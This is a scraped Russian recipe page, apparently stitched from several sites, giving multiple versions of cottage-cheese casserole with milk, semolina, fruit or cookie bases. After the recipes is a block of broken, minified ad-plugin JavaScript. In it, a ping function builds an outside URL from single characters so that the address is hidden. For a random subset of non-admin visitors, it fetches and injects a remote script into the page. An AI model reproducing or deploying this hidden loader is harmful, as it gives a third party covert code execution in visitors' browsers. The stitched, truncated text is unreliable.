Творожная запеканка с молоком

Творожная запеканка на молоке с манкой

Описание блюда.

Здравствуйте, дорогие читатели. Рада представить Вам первый рецепт, присланный для участия в нашем весеннем конкурсе.

Это еще одна вариация приготовления отличного блюда из творога — запеканки с молоком и манкой.

Как, написала нам автор рецепта — Ирэна, данное замечательное кулинарное изделие пришлось по вкусу не только ей, но и ее супругу.

По своему опыту скажу, что мужчины редко с удовольствием едят блюда, в которых нет мясной составляющей, поэтому думаю, что если даже муж нашей читательницы в восторге от данной выпечки, то уж детям и женской половине оно точно должно понравиться.

Предлагаю всем попробовать приготовить творожную запеканку с молоком и манкой по подробному пошаговому рецепту, представленному ниже, а также по достоинству оценить автора рецепта…

Пищевая ценность блюда на 100 гр.

Время приготовления: 50-60 мин.

Количество порций: 3-4 порции (900 г) .

Ингредиенты блюда.

  • Творог — 0,5 кг.
  • Яйцо — 2 шт.
  • Крупа манная — 40-80 г (2-4 ст.л).
  • Сахар — 50-75 г (2-3 ст.л).
  • Молоко — 50-75 мл (3-5 ст.л).
  • Изюм — 100 г по желанию.
  • Сметана — 20 г (1 ст.л) по желанию.
  • Соль — 2 г (щепотка).
  • Масло сливочное — 5 г для смазки формы.

Рецепт блюда.

На фото не представлены сметана и сливочное масло, так как они используются по необходимости.

Если вы предпочитаете румяную, зажаристую корочку на поверхности изделия, то лучше все-таки не пренебрегать этими продуктами и добавить их в состав творожной запеканки с молоком и манкой.

Творог и другие молочные продукты можно использовать любой жирности, но лучше отдать предпочтение домашним деревенским продуктам. Так как покупной творог, особенно в пачках, будет иметь более жидкую консистенцию и для компенсации этого потребуется использование большего количества манной крупы, что может негативно сказаться на вкусовых и диетических качествах итогового блюда.

Те, кто не любит сухофрукты в выпечке, могут их не использовать.

Изюм промываем и замачиваем в горячей воде.

2 ст.л манной крупы (1 ст.л оставляем для обработки формы) заливаем молоком (3 ст.л). Отставляем в сторону для набухания.

Включаем разогрев духовки до 180-200 С.

В это время в глубокой чаше миксером взбиваем яйца (2 шт), щепотку соли (1-2 г) и сахар (3 ст.л) до образования пенки.

Творожные зерна растираем с помощью ступки или протираем через сито.

С изюма сливаем воду и просушиваем его полотенцем. Добавляем сухофрукт, яично-сахарную смесь и набухшую манную крупу в миску с творогом.

Соединяем все ингредиенты в однородную массу. Она должна получиться не очень жидкой (консистенция густой сметаны), по необходимости можно добавить еще манной крупы, перемешать и оставить на 10-15 мин, чтобы злак разбух в твороге.

Форму смазываем сливочным маслом, слегка присыпаем манкой (или мукой, или панировочными сухарями). Если Ваша посуда имеет антипригарную поверхность, ее можно вообще не обрабатывать. Положив на дно противня пекарскую бумагу, вы также сможете дополнительно обезопасить себя от прилипания запеканки к нему и тем самым сделаете более легким этап вынимания изделия из формы.

Выкладываем полученную смесь в подготовленную посуду для выпечки.

Сверху, по желанию, смазываем заготовку сметаной, совсем чуть-чуть, для образования впоследствии аппетитной золотисто-коричневой поверхности.

Ставим противень в заранее разогретую до 180-200 С духовку.

Выпекаем в течение 40 минут. Готовиться блюдо может немного дольше, либо, наоборот, значительно быстрее, в зависимости от возможностей вашей плиты и высоты запеканки.

Готовое блюдо достаем из духовки (пропеклось или нет, определяем по сухой зубочистке), даем ему немного «отдохнуть» прямо в форме.

Остывший десерт разрезаем на порции, по желанию, блюдо можно слегка присыпать сахарной пудрой. Затем отправляемся пить ароматный чай с чудесной запеканкой вместе с вашими близкими.

Творожная запеканка с молоком

Нежная, сладкая творожная запеканка с плотной консистенцией. Попробуйте приготовить творожную запеканку с молоком по этому рецепту – вы останетесь довольны.

Ингредиенты

  • 700 гр творога
  • 350 мл молока
  • 4-5 ст.л. манки
  • 1 крупное яйцо
  • 3 ст.л. сахара
  • 10 гр ванильного сахара

Рецепт приготовления блюда в домашних условиях

  1. Творог протереть через сито и размять вилкой. Постепенно подливать молоко, тщательно размешивая и разбивая комочки. Яйцо взбить миксером с сахаром до образования пышной кремовой массы (приблизительно 2 минуты).
  2. Соединить яичную массу с творожной и перемешать. Постоянно помешивая, всыпать тонкой струйкой манную крупу. Духовку разогреть до 200/220С, форму для запекания (около 30*20 см) смазать сливочным маслом.
  3. Выложить творожную массу с молоком в смазанную форму и отправить в разогретый духовой шкаф. Выпекать творожную запеканку с молоком около 40 минут до золотистого оттенка.
  4. Вынуть форму из духовки и накрыть ее легким полотенцем на пару минут. Дать блюду остыть несколько минут. Нарезать теплую творожную запеканку на порционные кусочки и подавать с вареньем или джемом. Особенно вкусно с молоком. Приятного аппетита!

Похожие рецепты:

Диетическая морковная запеканка

Творожная запеканка с клубникой в мультиварке

Творожная запеканка с маком

480 мин. / Сложно

Запеканка из овсяных хлопьев

Творожная запеканка с мукой

Ваши отзывы и советы

Новое на сайте:

К сезону десертов:

120 мин. / Средне

120 мин. / Средне

480 мин. / Средне

480 мин. / Средне

Мы в соцсетях

FOODideas (идеи для еды) – это сайт, посвящённый искусству приготовления пищи дома, где собраны лучшие рецепты кулинарных блюд с фотографиями и подробными пошаговыми инструкциями, специально, чтобы вы могли приготовить любое, даже самое сложное блюдо в домашних условиях. Так же наши рецепты вы можете читать в нашем Яндекс Дзен канале – Foodideas Zen

Творожная запеканка с молоком

Вариант 1: Классический рецепт творожной запеканки с молоком

Творожная запеканка – это нежнейший пирог на основе творога и молока. Обязательно нужно включать подобные сладкие полезные десерты в рацион и взрослых и детей. Готовится выпечка из творога не долго, да и хлопот с ней не много. Соединить все ингредиенты и тут же отправить в духовку – а дальше только ждать вкусного десерта и разливать чай по чашкам.

Запеканка может быть классической с манной крупой или приготовленной по другому рецепту. К примеру, с яблочно-белковой начинкой, с творожным сыром или бананом. Каждый из вариантов по-своему привлекателен.

Ингредиенты:

  • 680 г мягкого творога;
  • 210 мл молока;
  • одно яйцо;
  • 3 ст. л. пшеничной муки;
  • 2 ч. л. разрыхлителя;
  • 4 ст. л. сухой манной крупы;
  • щепотка ванилина;
  • 4-5 ст. л. сахара;
  • щепотка соли;
  • для смазки формы растительного масла.

Пошаговый рецепт творожной запеканки с молоком

В одной емкости перемешайте мягкий творог, молоко, яйцо, муку и манку. Добавьте разрыхлитель, ванилин, сахар и немного соли. Хорошенько промешайте массу.

Включите духовку на температуру 180-190˚С.

Выберите небольшую керамическую форму для запеканки. Можно взять и антипригарную, какая есть под рукой. Застелите ее пищевой фольгой. Смажьте каплей растительного масла. Сейчас фольгу при желании можно присыпать сухой манной крупой, чтобы выпечка не приставала к стенкам.

Вылейте творожное тесто в форму. Верх разровняйте лопаткой. Когда духовка нагреется, отправьте форму в ее жар. Забудьте о пироге на 35-40 минут. А затем достаньте запеканку и дайте ей немного остыть перед тем, как нарезать.

В творожное тесто по вкусу можно добавить что-то дополнительно. К примеру, кусочки фруктов, свежие ягоды, десертную пряную зелень или специи. Если молоко предварительно вскипятить со щепоткой имеретинского шафрана или куркумы, и только после остывания добавить в тесто, запеканка получится оранжевой. Тот же эффект получится, если и вовсе заменить молоко апельсиновым или мандариновым соком.

Вариант 2: Быстрый рецепт творожной запеканки с молоком

Для быстрого рецепта творожной запеканки берите небольшие формочки вместо одной крупной. Так выпечка получится порционной. К тому же, каждую порцию можно сделать с какой-нибудь начинкой – яблоки, сухофрукты, орехи, семечки.

Ингредиенты:

  • полкило зернистого творога;
  • 3 ст. л. сметаны;
  • полстакана молока;
  • полстакана манки;
  • ложечка сливочного маслица;
  • два яйца;
  • горсть изюма;
  • пару ложек семян кунжута;
  • пару щепоток пищевой соды;
  • 3-4 ст. л. сахара.

Как быстро приготовить творожную запеканку с молоком

Соедините в кастрюльке молоко, манку, соль и сахар. Добавьте сливочного масла. Поставьте на умеренный огонь. Доведите до кипения, постоянно при этом помешивайте венчиком или лучше ложкой. Должна получиться густая манная каша. Остудите ее до теплого состояния.

Кунжут можно поджарить на сухой сковороде, но это не обязательно. Даже сырой он даст тесту интересную текстуру.

Изюм промойте и чуток обсушите полотенцем.

К каше добавьте творог, сметану, яйца и соду. Все хорошенько промешайте, чтобы вышло тесто. Добавьте изюм и семена кунжута. Еще раз немного перемешайте.

Застелите форму для выпечки тонкой пекарской бумагой. Выложите тесто, слегка разровняйте лопаткой. Отправьте в духовку, прогретую до 180˚С. Больше температуру делать не нужно, иначе низ пирога начнет гореть. Готовой запеканке дайте чуток подостыть, а затем нарежьте на куски.

Для выпечки целого пирога уйдет около 40 минут. А если формовать тесто в небольшие силиконовые формочки, понадобится их выдержать в духовке всего-то 20-25 минут.

Вариант 3: Творожная запеканка с молоком и начинкой из яблок

Яблочная начинка делает пирог разнообразнее. А в само тесто в рецепте будет добавлена овсяная и кукурузная мука – получится интересный вкус давно известного блюда.

Ингредиенты:

  • полкило творога;
  • полстакана молока;
  • ложка сливочного масла;
  • два яйца;
  • ложка овсяной муки;
  • ложка кукурузной муки;
  • 4-5 ст. л. пчелиного меда;
  • чуток соли;
  • 2 ч. л. разрыхлителя;
  • одно крупное яблоко;
  • половинка апельсина.

Как приготовить

Зернистый творог протрите через сито. Так консистенция теста выйдет однороднее и нежнее. Это повлияет и на вкус готовой запеканки.

Добавьте к творогу молока, сливочное масло, овсяную и кукурузную муку. А также яичные желтки, соль, мед и разрыхлитель. Хорошенько промешайте массу, чтобы получилось полноценное тесто.

Яблоко очистите. Мякоть нарежьте тонкими ломтиками. Сбрызните соком половинки апельсина. Только проследите, чтобы не попались косточки. Если фрукта под рукой не оказалось, возьмите каплю яблочного уксуса или ложку белого вина.

Яичные белки подсолите (будет достаточно одной щепотки). Взбейте миксером или блендером до густой пены.

На противень застелите пергамент. Выложите три четверти творожного теста. Затем слой яблок, взбитые белки. Поверх аккуратно выложите оставшееся тесто. Нужно не нарушить структуру белков. По такому же принципу можно готовить пирог из творога с грушей, персиками или абрикосами.

Уберите противень в духовку для выпечки. Температуру при этом лучше держать на уровне 180˚C, а времени понадобится 40-50 минут.

Слой яблок в запеканке будет необычно нежным и воздушным. Все благодаря взбитым белкам. Этот воздушный слой могут заменить и сливки. Доведите их до пышности миксером и используйте, как начинку для творожной запеканки с яблоками.

Вариант 4: Творожная запеканка с молоком и бананом

Банан в тесто добавляется в виде пюре или тонких слайсов. Если нарезать его ломтиком, в творожном тесте будет видна фруктовая прослойка. Это разнообразит подачу кусочков запеканки – выйдет аппетитно!

Ингредиенты:

  • 240 г банана (два средних);
  • 0,6 кг творога;
  • полстакана молока;
  • ложка с горкой пшеничной муки;
  • цедра одного лимона;
  • ложка сливочного масла;
  • щепотка соды;
  • по вкусу сахара;
  • ложка подсолнечного маслица.

Пошаговый рецепт

Разомните банан в пюре. Это можно сделать вилкой, погружным блендером. Или просто натереть фрукт на терке.

Добавьте к банану творог, молоко, муку и масло. Промешайте. Введите цедру лимона, соду и сахар. Мешайте, пока консистенция не будет однородной. Можно воспользоваться миксером – так замес пройдет быстрее.

Любую форму для выпечки (например, силиконовую) смажьте маслом. Выложите в нее все тесто. Отправьте в духовку при 180˚С. Пеките 40 минут. Затем вытащите форму. Положите на нее тарелку. Воспользуйтесь прихватками и переверните форму вверх. Тарелка останется внизу. Снимите форму. Запеканка останется лежать на тарелке. Такими простыми движениями вы можете переложить готовый пирог на тарелку, не боясь, что он поломается или упадет на пол.

По желанию в тесто можно ввести мороженые ягоды. Только перед этим панируйте их в муке или крахмале, оттаивать ягодки не следует. Именно тогда они останутся в готовой запеканке целыми и не окрасят все тесто своим соком.

Вариант 5: Творожная запеканка с молоком на основе печенья

Для рецепта творожной запеканки с молоком на основе печенья выберите песочное печенье. Можно домашнее или покупное. Главное, чтобы оно было свежим и рассыпчатым.

Ингредиенты:

  • полкило песочных печений;
  • полкило творога;
  • пару ложек молока;
  • одно яйцо;
  • несколько ложек сахарной пудры;
  • ложка картофельного крахмала;
  • кусочек мягкого творожного сыра;
  • пару ложек сливочного масла.

Как приготовить

Измельчите печенья в мелкую крошку. Смешайте с хорошо размягченным сливочным маслом. Выложите на противень. Сформируйте бортики. Слегка утрамбуйте получившуюся основу лопаткой или ложкой.

В миске или чашке соедините творог, молоко, яйцо, сахарную пудру. Добавьте крахмал, творожный сыр кусочками. Тщательно перемешайте массу, чтобы не было комочков.

Аккуратно, чтобы не поломать основу, выложите творожное тесто на слой печений. Разровняйте.

Запеките полчаса при температуре 200˚С в духовке.

В слой печения можно добавить даже сухие вафли. Измельчите их вместе, а дальше действуйте по рецепту. Приятного аппетита!

Творожная запеканка с манкой рецепты на молоке и сметане

Творожная запеканка с манкой прекрасная альтернатива всеми любимым сырникам, поскольку запеканка получается более диетическим блюдом в отличие от первых. Готовится запеканка как в духовке, так и в мультиварке. В качестве наполнителя в запеканку можно добавлять изюм, мак, шоколад, какао, финики или любые сухофрукты. Творожная запеканка получается такой нежной, что придется по вкусу вашим детям, даже если они не очень хорошо относятся к манке или творогу, в этом виде они уплетут все “за обе щеки”!

Творожная запеканка с манкой рецепт на молоке

Ингредиенты:

Манная крупа 4 ст.ложки

Молоко 1 стакан (я развела сухое)

Сахар 3 ст.ложки

Ваниль 0.5 ч.ложки

Масло растительное для формы

Как готовить:

1. Разбиваем в глубокую чашу яйца, кладем сахар и все хорошо взбиваем.

2. Манку заливаем теплым молоком и даем постоять, набухнуть полчаса.

3. Изюм хорошо промываем, обдаем кипятком и снова промываем.

4. Творог пробиваем блендером или протираем сквозь сито.

5. В глубокой чаше смешиваем творог, взбитые с сахаром яйца, молоко с манкой, добавляем ванилин и соль.
6. Форму смазываем маслом, посыпаем манной крупой, выкладываем тесто и ставим в подогретую до 180 градусов духовку. При запекании форму можно прикрыть крышкой или фольгой, которую убрать минут за 5 до готовности, дав корочке слегка подрумяниться. Время запекания зависит от размера формы и особенностей духовки. Я готовила в форме 20Х30, при температуре 180-190 градусов 45 минут.
Творожная запеканка с манкой на молоке вкусна, как в теплом, так и в холодном виде. Подавать ее можно с вареньем, медом, сгущенным молоком или сметаной.

Творожная запеканка с манкой рецепт на сметане

Творог 600 гр
Манная крупа 2-3 ст.ложки
Сахар 3 ст.ложки
Сметана 5 ст.ложек
Яйца 3 шт
Соль-щепотка
Ванилин 0.5 ч.л

Как готовить:

1. Творог, при необходимости, пробить блендером.
2. Взбить с сахаром яйца, добавить сметану.
3. В глубокой чаше смешать все ингредиенты: яйца с сахаром, сметану, творог, манную крупу, ванилин, соль. Дать тесту постоять 30 минут, что бы манка набухла.
5. Выложить тесто в подготовленную форму.
6. Выпекать в духовке или мультиварке.

Творожная запеканка рецепт с манной кашей

творог 600 гр
сахар 3 ст.л
яйца 2 шт
молоко 300 мл
манка 3 ст.ложки с горкой
ванилин
соль
масло для формы

Как готовить:

1. Прелесть рецепта заключается в том, что у нас порой остается манная каша, которую можно использовать. Если таковой не имеется, то сварите густую манную кашу на молоке, добавив соль и сахар.

2. Слегка взбейте яйца.

3. Творог протрите через мелкое сито или пробейте блендером.

4. Смешайте творог, манную кашу, яйца, соль, ваниль.

5. Выложите тесто в подготовленную форму и выпекайте в духовке или мультиварке.

Совет: Во всех трех вышеизложенных рецептах половину порции манки можно заменить крахмалом. Запеканка в этом случае получается еще более нежная по консистенции.

Творожная запеканка с манкой, рецепты на молоке и сметане-простые, легкие и быстрые рецепты. Смотрите еще вкусные рецепты запеканок: Запеканка из кабачков с фаршем, Запеканка из цветной капусты с курицей и видео рецепт открытого пирога из слоеного теста с маком в сметанной заливке:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Оцените рецепт ОценитьПрименить